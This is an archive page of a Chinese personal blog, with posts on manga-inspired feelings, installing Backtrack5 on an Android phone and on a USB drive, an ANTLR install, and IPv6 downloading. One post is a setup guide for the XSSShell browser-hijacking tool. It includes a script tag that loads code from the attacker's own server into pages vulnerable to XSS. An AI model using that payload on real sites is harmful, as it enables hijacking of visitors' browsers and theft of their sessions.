作者归档:hhjack

I”s 第三日

发表于
回复

都已经是第三天了,我以为开始正常上班忙碌起来心头的抑云就会散去了,I guess not this time. 下午写着代码居然I”s的最后几幕又浮现眼前,季子最后在录像带里对一贵说的话像一段背景音乐一直伴随着全卷终了(总不能在这儿触景生情的潸然泪下吧)。不管是季子还是寺谷靖雅还是麻生蓝子,似乎哪个人都能在一贵感情迷茫临近退缩的时候站出来帮他分析来龙去脉,何去何从,并且他们都是自愿退出一贵和伊织的感情故事,他们是可贵甚至理想的,一贵是幸运的。归根结底是一贵自己的执着追求不离不弃是他达到幸福的彼岸。

相比最初的几天,虽然目前仍是隐隐内心痛的状态,但已经能够稍微分析一下这个故事而不是再把他完全作为事实来看待了,不然的话估计要永远沉沦于这些画面之中而无法解脱了。伊织在校三年,居然没有一个第三人正式追求过她,这当然成就了一贵得天独厚的机遇。反而一贵三年倒是有好几个让他不知所措的感情种子,但还好他终能克制了这种青春躁动的生理冲动,季子也能够清醒认识真相并毅然退出。真正隔阂彼此倒是一贵和伊织的胡思乱想,虽然一句话就能解除误会,但正是轻信自己的推理而让尴尬持续,大费周章。

为什么结尾季子的录像搭配一贵和伊织的牵手前行能成为直击内心感情涌动之泉的催泪弹,恐怕是因为它真的是一个极佳的答案。它回答了季子为什么退出,一贵一直追寻的梦想,也是曲折的情节总向着一个方向不断行进的本质所在。写来写去,也不知道是能帮我排解这种情绪,还是在不断激发它,难道蔡老师当年的“笑看人生”才是正解?怎么好像一部漫画把我从童年带到了中年

W2T

发表于
回复

一觉醒来望着阴雨天空,我居然还是无法释怀,相比眼泪,更多的是心理上的起伏不定。难道I”s比其他漫画能产生更多共鸣吗,或者是近来我变得异常脆弱多愁善感了。原来这个故事不是讲给我听,而是把我的故事讲出来给自己听的,but I ‘ve missed the very ending。

ITCHAN小学告白留下的阴影让他中学面对心动的女孩缺少自信与勇气走上前去。似乎只有看起来是被安排的才是可以安心相处。即使这样,他们居然仍不断有很多次接触。几年后他知道了她原来也是喜欢着他的时候,幸福终于第一次扣响了门闩了。

不同的是当我知道这件事的时候,I guess I ‘ve already missed my bus, the bus conducts me to love. 原来那些暗示是那么明显,但别以为这些暗示就代表了永恒,What a fool I am! I should not hide any more, just face to my feelings. 那种心口不一,躲躲闪闪,是自己的伤,是别人的负担。I missed the confession once, perhaps that ‘s the only confession I need for my whole life.  第一次后悔曾经的选择,第一感受到不完整的情感世界,而且确实有机会与之擦肩而过。I wonder what it will be like today if I confess to you during middle school.

“What is your dream”

“It is only until recently that I could clear my thought. No matter what the dream is, you are always there. No matter how many girls walking by, you are the only one I could imagine as a lover living togther.”    

“(Please fill in the blank)”

I have no fear to face the feelings anymore, I love you all the way from that day we first met, no more, no less.

I”s

发表于
回复

这是一场梦,梦见你又回到青涩酸甜的校园,ITCHAN的心理活动就像是一个缩影,戏剧性的部分只是他在几页纸之间把你几年的情感实实在在的画了出来。

http://www.anymanga.com/i-s/,我看的是英文版,也许在本该忙碌的夏日只有打着英文学习的借口才能慰藉闲暇乐怡的时光。日文漫画,译成英文,华人看,没有任何语言隔阂,因为那不过是又一次开始做年轻时的白日梦。

原来我也和他一样都这么喜欢胡思乱想,他喜欢往糟糕了想,我也一样,现实很简单,简单的最难理解。

别那么忘我的激励他人,也许那并不是她想要的,也许它一开始想要就只是你,是你把她一步步从自己身边推开。但没有那山间的回声荡漾,会不会彼此就没有了这种归属的感激。梦想不一定是个 职业,不一定是一番事业,它也许就是为对方付出,着想,牵手走在一起。两个互相单恋的人是最酸的,一旦走在了一起也是最让人欣欢的。爱是彼此的,单方面的不是爱,是让你自己或者让对方受伤的篇章。

白底黑字,白纸黑画,纯粹的写实,真切的个人,在现实的不能再现实的一幕幕间给你讲一段曲折的不能在曲折的神伤。我想很难有机会再回到这里了,这也许是每一次到结局时分都惆怅不已的原因,即便是一个故事,你也没有机会去第二次演绎当中的对白,那它和真实的人生区别在哪里呢。同样激起了你内心的波澜,就当做自己亲身经历的一次别样的旅程有何不妥,何况这并不是一个与你相去甚远的人生,只是你曾经失去的那一段情色绵绵,踯躅,踌躇,踟蹰。

还有心思精力,但我不想用彩色打点上下文字,他们只适合最写实的陈放。

我的手机

发表于
1

此篇完全是写给自己的,提醒一下下次换手机需要的特性:

现在用的nokia N86的好功能一定要保留。具体说来

  • 键盘输入快且准,qwerty或者九键都无所谓,没有触感的虚拟键盘是没办法产生手指记忆的,更不可能盲打。
  • 通话记录查询一键直接,菜单选项选来选去的才进去是多么恼人的一件事儿。手机的短信,电话功能才是核心。
  • 关机闹铃当然要native支持,没用过还真没发现,原来现在很多手机都不支持这个功能才使得很多人睡觉还得开着机。
  • 照相机必须强劲,总有人说你想要高清晰度就买相机啊。带个手机我都嫌累赘,还能拿相机吗?况且相机能发彩信吗,能用来扫描二维条形码吗,能把照片通过Email发送走吗。

To Be Continue……

同时为了适应PWN的目的,手机最好带有下属特性

  • 电池工作时间足够长久,怎么也得能满功耗(WIFI,蓝牙全开,打着游戏或者打电话)下跑一天吧
  • 需要蓝牙,需要NFC,需要WLAN网卡,最好支持monitor mode
  • 如果能有通用USB接口,有红外,rj45接口就更好了
  • 操作系统不管是Android还是Windows Phone,但一定得做到能安装任意软件,脚本环境,完全调用手机每个功能部件

To Be Continue……

眼下看,饱含Nokia情节的我感觉Lumia 1000极有可能达到上述要求,期待上市中……

Backtrack5 on Android

发表于
回复

家里有台SamSung i9000,一直就没怎么折腾过,实在是有愧于Android开放的特性。折腾的最终目的就是让Backtrack5流畅的运行在掌中。刷系统升级linux,安装有关工具,拷贝Backtrack镜像到手机并启动。

如果对于刷机过程很有经验的话,下面的Update小节就可以无视了。直接跳到后面boot节。  

使用的环境和有关工具:

Android Rom: lidroid-i9000-xxjvu-v2 (2.3.6 / XXJVU)

From: http://apps.lidroid.com/rom/

Download: http://dl.lidroid.com/sgs/xxjvu/lidroid-i9000-xxjvu-v2.rar

手机连接电脑的驱动:

From: http://bbs.lidroid.com/t-22369-1-1.html

Download: http://u.115.com/file/e65xf26q

Backtrack5 ARM (modified)

From: http://blog.l-lacker.com/security-backtrack-5-on-a-galaxy-s-phone/

Download: http://l-lacker.com/bt5/BT5_ARM_Joined.zip

Quicksshd v2.0.3 (这个工具不是必须的,只是方便在PC上操作手机的命令行,特别是在Backtrack下安装工具包)

From: http://soft.shouji.com.cn/down/19283.html

用手机桌面上的力卓市场右上角的方块按钮扫描这个条码就可以下载

quicksshd

Putty.exe (运行在电脑上连接手机的ssh,不是必须的,只是方便执行手机上的命令)

From:http://www.chiark.greenend.org.uk/~sgtatham/putty/ download.html

Download: http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

android-vnc-viewer

From: http://code.google.com/p/android-vnc-viewer/downloads/list

用手机桌面上的力卓市场右上角的方块按钮扫描这个条码就可以下载

vnc

BusyBox Pro V6.9

From: http://www.anyouhui.com/detail/5235/

用手机桌面上的力卓市场右上角的方块按钮扫描这个条码就可以下载

busybox

android-terminal-emulator

From: http://www.appbrain.com/app/android-terminal-emulator/jackpal.androidterm

用手机桌面上的力卓市场右上角的方块按钮扫描这个条码就可以下载

terminal

Update:   

由于安装Backtrack时需要Android Root权限,但这台i9000原操作系统Android 2.1update上运行z4root提权无效,遂刷机到2.3.6由力卓提供的Android。由力卓定制的这个Rom升级带来画面的改进,也直接提供了Root权限。

升级操作系统步骤:

0.备份手机上的通讯录,短信,照片等

1.下载Rom包,解压缩

2.运行解压缩文件夹内的Odin3 v1.85cn.exe,按下图配置

odin

3.拔下手机的Sim卡和外置SD卡

4.进入设置-应用程序-格式化内置SD卡

5.按下手机的组合键: home+开关+声音调小 维持6-7秒

6.手机画面进入小Android机器人挖煤的界面

7.将手机连接USB线

8.Odin第二行ID:COM变成黄色后,点击开始,直到绿色PASS出现

9.拔下USB,手机经过数分钟进行启动,并可以听见语音提示

10.手机启动,进行设置后进入系统,刷机升级完毕

20120402091124

升级完毕后配置Wifi联网,下载上述的AndroidVNC,Terminal Emulator,BusyBox。

20120402085247

 boot: 

下面就要开始为Backtrack5的运行搭建环境了。这部分我也陆续遇到了非常多的问题,各种错误,我不想一一列举在这里了。只要严格按照下述步骤操作,是不会有问题的。各种镜像文件的来源,一定不要随便下载,要严格按照提供的地址。给Android使用的Backtrack是经过裁剪的,和原版有区别。原版的Bash在运行时出现Input/Ouput error让我要死要活啊,直到换上裁剪版的BackTrack才得以解脱。Rule is Rule!

这个版本Android Rom安装后自带Busybox,存放在/bin目录,但命令并不全,即使你使用BusyBox Pro重新安装BusyBox到/system/xbin或者/system/bin,但由于环境变量中/bin在前,Backtrack运行脚本执行时仍然调用这个系统自带的残缺busybox而导致chroot失败。

所以我的解决方案如下: 

1.打开手机自带的Re 管理器,进入/bin目录,将它改成读写(原来为只读),删除掉/bin内全部文件(手机重启后该目录内容会自动恢复,所以重启后需要再次删除)。

修改前                                  修改后

20120402084534
20120402084546

2.运行busybox pro 安装最新版的busybox.

3.下载Backtrack ARM (modified), 经过层层解压,将

list

这些文件进行保留。

4.我希望在外置SD卡运行Backtrack,所以需要对原有启动脚本进行一下修改。用十六进制编辑器(UltraEdit)打开bootbt,修改第6行为

export kit=/sdcard/external_sd/BT5

5.上传文件的方法很多,比较推荐的方法是安装驱动后,将手机USB调试的勾去掉,然后按home键返回桌面,插上USB线。电脑会识别手机,在我的电脑中就能访问到外置和内置SD卡,大的就是外置的SD卡。

6.将上述文件传到外置SD卡的BT5目录(需要自己创建),外置SD卡在Android的挂载位置为/sdcard/external_sd

7.进入Android terminal emulator,输入

su

cd /sdcard/external_sd/BT5

sh bootbt

Backtrack就启动了

20120402090056

再输入

starvnc

等一分钟,然后按home键返回,打开AndroidVNC,配置如下

20120402085324
20120402085341

 点击连接,就进入Backtrack的图形界面了~ 

20120402090401

20120402090853

后记: 

Aircrack系列工具默认是没有装在这个裁剪的BackTrack上面的,如果需要安装,可以在Backtrack的命令行下面执行

# install dependency for libssl-dev
apt-get install zlib1g-dev 
# install libssl-dev
wget http://launchpadlibrarian.net/64412492/libssl-dev_0.9.8k-7ubuntu8.6_armel.deb
dpkg –install libssl-dev_0.9.8k-7ubuntu8.6_armel.deb
rm libssl-dev_0.9.8k-7ubuntu8.6_armel.deb 
# get and install aircrack-ng
apt-get install source-aircrack-ng
cd /var/backtrack/sources/aircrack-ng/1.1/bt9/upstream-sources/
tar -xzf aircrack-ng.tar.gz
cd aircrack-ng/
make
make install 
# set path variable
echo “export PATH=$PATH:/usr/local/sbin” >> ~/.bashrc
export PATH=$PATH:/usr/local/sbin

但是i9000的无线网卡并不支持混杂模式,所以Aircrack系列工具并不能抓包破解Wifi~

Aircrack工具集目前在iOS(ipad,iphone)上面也由于缺少驱动,不能把网卡设为混杂。安装Backtrack意义也不大(怎么说操作起来也不如电脑方便不是)

唯一支持Backtrack良好,并且Aircrack工具集运行正常的据说就只有Nokia的N900~等我这个N86坏了,一定换台N900~

既然Backtrack不能发挥它无线破解的威力,那干嘛折腾这么几天呢~

Why,Because I can!

参考资料: 

安装Aircrack的命令: http://pastebin.com/tPM8Qshp

Aircrack工具在手机平台的支持情况: http://www.linux-backtrack.com/2012/02/aircrack-ng-on-phones-android-iphone-and-others/

Backtrack在其他手机平台的安装教程: http://www.ifans.com/forums/threads/backtrack-5-arm-debian-based.344166/

Backtrack安装到i9000的英文教程: http://blog.l-lacker.com/security-backtrack-5-on-a-galaxy-s-phone/

i9000升级i操作系统教程: http://bbs.lidroid.com/t-22369-1-1.html

BackTrack5 R2 persistent USB 安装

发表于

这两天Anonymous 放出来了 Live CD 的OS,基于ubuntu的,折腾两天,想通过Lili把它搞到U盘上并且设置persistent模式。折腾期间还阴差阳错的顺带试了试Anonymous OS(使用TOR匿名网络),可是效果欠佳,估计是TOR被墙的原因。折腾了一天,突然看新闻发现Twitter上Anonymous组织放话说SourceForge上面的Anonymous OS不是他们发布的,有可能有恶意软件包含其中。遂没有再折腾下去,不过从界面看来”Anonymous OS”还是很酷的,稳超Backtrack。

反正手也折腾热了,就再关注下Backtrack吧,月初Backtrack5 发布了R2版本。从Backtrack5开始就一直用着不是很舒坦,官网上的教程也没随着更新,如何把Backtrack5搞到USB上而且是persistent模式至今未成功啊。看国外论坛上提到一个想法不错,Backtrack是支持硬盘安装的,而且是全自动化的,那用这种方法直接安装在U盘上不是也可以~试了一下午,流程如下:

1. 用lili或者unetbootin把iso搞到一个U盘A上

2. 重启后设置BIOS,设置用U盘启动,而且要把硬盘全部禁用(保证后面U盘安装的时候别影响到硬盘)

3. 进入U盘A的BT5,再插入一个U盘B(建议16G),在BT中运行桌面那个sh脚本

4. 运行后会进行一系列设置,选择新插入的U盘(sda或者sdb,反正整个电脑目前就它一个可见)

5. 进行安装,大概得一个小时吧,安装完毕。

U盘B上的就是Persistent的Backtrack5 R2了,用U盘B启动电脑,没有开机选择界面,直接进入系统 root/toor

另外我使用中发现Backtrack5 自带的wicd 连接无线网总是失败,关于这个问题论坛上问的人也很多。下面就是一个受害者咆哮的节选

After much hair pulling, screaming at myself and yelling more cause I accidentally screwed up my mac osx lion install on my macbook pro.

所以还是不折腾wicd了,用iwconfig配置无线网吧,虽然是命令行工具,但也不麻烦。这里以wpa为例吧,现在wep很少了。

1、首先iwconfig一下看看有没有无线网卡,如果没看到,那可能是无线网络开关没开。找到的无线网卡是wlan0

2、iwlist wlan0 scanning  搜索一下可用的无线网络,主要是为了得到SSID,如果要连上的无线网络的SSID是隐藏的,可以跳过这一步。这里我的SSID是freebug

3、接下来就要用wpa_supplicant来进行配置了。

wpa_passphrase freebug 11223344 > /etc/wpa_supplicant.conf 把信息写入到配置文件中,上面freebug是SSID,11223344是无线网络设置的wpa密码。 

4、wpa_supplicant -B -iwlan0 -c /etc/wpa_supplicant.conf  设置无线网络参数

5、dhclient wlan0,稍等一会就可以获得正确的ip地址了。

ANTLR Python Runtime Install

发表于
1

ANTLR能够生成Python形式的parser和lexer,但要使用这两个er需要安装python的antlr运行时库。

wget http://www.antlr.org/download/antlr-3.1.3.tar.gz 
tar xzf antlr-3.1.3.tar.gz    
cd antlr-3.1.3/runtime/Python    
sudo python setup.py install

我用的是Python 2.6,它会去下载
http://pypi.python.org/packages/2.6/s/ setuptools/setuptools-0.6c5-py2.6.egg

但该版本的egg已经不存在了,所以运行时会安装失败。 解决方案:手动下载新版本egg
http://pypi.python.org/packages/2.6/s/ setuptools/setuptools-0.6c11-py2.6.egg

并放在setup.py目录下,修改为原来的文件名(c11改为c5),再次安装即可成功

XSSShell的使用

发表于
回复

最近关注了一下新的WooYun上的WEB漏洞,发现XSS在Web2.0时代真的是如鱼得水,异常活跃。XSS的利用也从简单的弹框,cookie获取,到了能够利用XSSShell实现彻底劫持目标浏览器的目的。XSSShell的功能很丰富,它的存在使得XSS点形成Second Shot,道生一,一生二,二生三,三生万物~并且被XSS的页面能够在新开的页面当中注入同样的代码实现对此后所有页面的JS使用权的驾驭。但真正付诸使用,配置是挺烦的一件事,要改很多文件,想来作者以后应该提供个配置脚本简化这一过程。

 

以最新的版本0.62叙述一下配置的过程,配置的目的如下:

mysite,myxsspath都是依据你自己的ASP空间的真实情况来配置的,xsfile.asp就是原xssshell.asp,我改了个名字而已。

 

将xssshell.asp改名为xsfile.asp ,然后编辑xsfile.asp,修改72行起的四个变量

  • var SERVER = “http://www.mysite.com/myxsspath/admin/“;
  • var ME = SERVER + “xsfile.asp?p=1<%=VicAdd%>” ;
  • var CONNECTOR = SERVER + “admin/connector.asp”;
  • var COMMANDS_URL = SERVER + “admin/commands.asp”;

接下来修改db.asp

  • Const DBPATH=(指向你的站点数据库文件绝对路径)
  • 相信使用XSSShell和拥有Web空间的人都知道怎么获取这个路径,比如用ASP的Server.MapPath。
  • 下面一个参数是口令的设置,搜索w00t这个字符串,然后替换为你希望的口令即可。

准备工作就绪,上传admin目录,db目录和xsfile.asp到指定位置。

只要在有XSS问题的页面插入

<script src=http://www.mysite.com/myxsspath/xsfile.asp />

就可以使用了。登录http://www.mysite.com/myxsspath/admin,管理这些上线的XSSers吧。

 

ipv6的多线程下载

发表于
回复

ipv6在教育网和科技网都是主要的资源流通手段,电影游戏等大的资源都是通过这种不花流量不限速度的方式在用户之间传输。utorrent,Filezilla分别可以用于BT和FTP情况下的资源获取工具,对于主流的应用这些工具已经足以应付,因为大部分资源都来自于类似六维这种ipv6的PT站点。 

但偶尔会有一些http下的镜像站点,比如最近想下载一个版本的Linux系统( http://mirrors.ustc.edu.cn/backtrack/ )。其实它本身是支持ipv6下载的,但现有下载工具(迅雷之类的)都不支持ipv6,这样就只能单线程的通过浏览器(IE,FireFox)等下载资源,虽然速度还可以,但像操作系统这种级别的软件下载起来还是很需要耐心的。如果能多线程下载这些资源想来性能也会有很大的提升。

在这样的条件下,有两个解决方案。第一个方案比较通用,但稍微麻烦一些。在windows下,通过netsh设置v4到v6的端口转发,然后使用下载工具填写本机地址下载文件。

具体做法如下,打开CMD

>netsh

netsh>interface portproxy
netsh interface portproxy>add v4tov6 8888 2001:da8:d800:95::110 80
netsh interface portproxy>s a

侦听 IPv4:                 连接到 IPv6:

地址            端口        地址            端口
————— ———-  ————— ———-
*               8888        2001:da8:d800:95::110 80

这里2001:da8:d800:95::110是远程服务器(刚刚我说的那个http站点)的ipv6地址。获取该地址的方法很多,比如通过ping或者nslookup命令(同样是在CMD下输入)。

>nslookup -qt=aaaa mirror.edu.backtrack-cn.org
Server:  localhost
Address:  192.168.1.1

Non-authoritative answer:
mirror.edu.backtrack-cn.org     canonical name = mirrors.ustc.edu.cn
mirrors.ustc.edu.cn     AAAA IPv6 address = 2001:da8:d800:95::110

这样通过迅雷就可以下载目标文件了, 比如目标文件地址为 http://mirrors.ustc.edu.cn/ backtrack/iso/BackTrack5.iso

填写到迅雷中的地址就是http://127.0.0.1:8888/iso/BackTrack5.iso

这种解决方案比较通用,但还有一种更为简单的方法,不过只适合FireFox,安装DownThemAll 这个插件,然后通过它下载就能做到多线程了哈。